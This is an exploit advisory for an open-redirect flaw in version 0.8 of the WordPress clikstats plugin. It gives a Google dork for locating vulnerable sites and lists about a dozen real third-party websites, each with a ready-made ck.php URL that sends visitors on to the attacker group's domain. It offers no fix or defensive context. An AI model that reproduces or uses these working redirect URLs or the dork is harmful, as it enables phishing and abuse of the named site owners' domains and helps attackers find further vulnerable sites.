######################
# Exploit Title : Wordpress clikstats plugin Open Redirect
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/clikstats/
# Google Dork : inurl:"/wp-content/plugins/clikstats/ck.php?"
# Sofware Link: https://downloads.wordpress.org/plugin/clikstats.zip
# Date: 06 Feb. 2016
# Version: 0.8
# Tested On : Windows 7 /FireFox
#################################
# Exploit And Demo:
#http://www.nils-peschke.de/wordpress/wp-content/plugins/clikstats/ck.php?Ck_id=514&Ck_lnk=http://ashiyane.org
#http://www.deco2noel.com/wordpress/wp-content/plugins/clikstats/ck.php?Ck_id=589&Ck_lnk=http://ashiyane.org
#http://szelvedo.org/site/wp-content/plugins/clikstats/ck.php?Ck_id=68&Ck_lnk=http://ashiyane.org
#http://oda.com/wp-content/plugins/clikstats/ck.php?Ck_id=6566&Ck_lnk=http://ashiyane.org
#http://www.ambientstudio.it/wp-content/plugins/clikstats/ck.php?Ck_id=20&Ck_lnk=http://ashiyane.org
#http://www.van-rooijen.com/wp-content/plugins/clikstats/ck.php?Ck_id=80&Ck_lnk=http://ashiyane.org
#http://erdelyikepek.hu/site/wp-content/plugins/clikstats/ck.php?Ck_id=20&Ck_lnk=http://ashiyane.org
#http://erdelyikepek.hu/site/wp-content/plugins/clikstats/ck.php?Ck_id=20&Ck_lnk=http://ashiyane.org
#http://ecoadventures.eu/wp-content/plugins/clikstats/ck.php?Ck_id=1333&Ck_lnk=http://ashiyane.org
#http://theshams.com/wp-content/plugins/clikstats/ck.php?Ck_id=146&Ck_lnk=http://ashiyane.org
#http://theweddinggirl.co.uk/wp-content/plugins/clikstats/ck.php?Ck_id=10908&Ck_lnk=http://ashiyane.org
#http://www.daquipromundo.com.br/blog/wp-content/plugins/clikstats/ck.php?Ck_id=94&Ck_lnk=http://ashiyane.org
######################
# discovered by : Amir.ght
# SP Tanx : Mahdi.Hidden
######################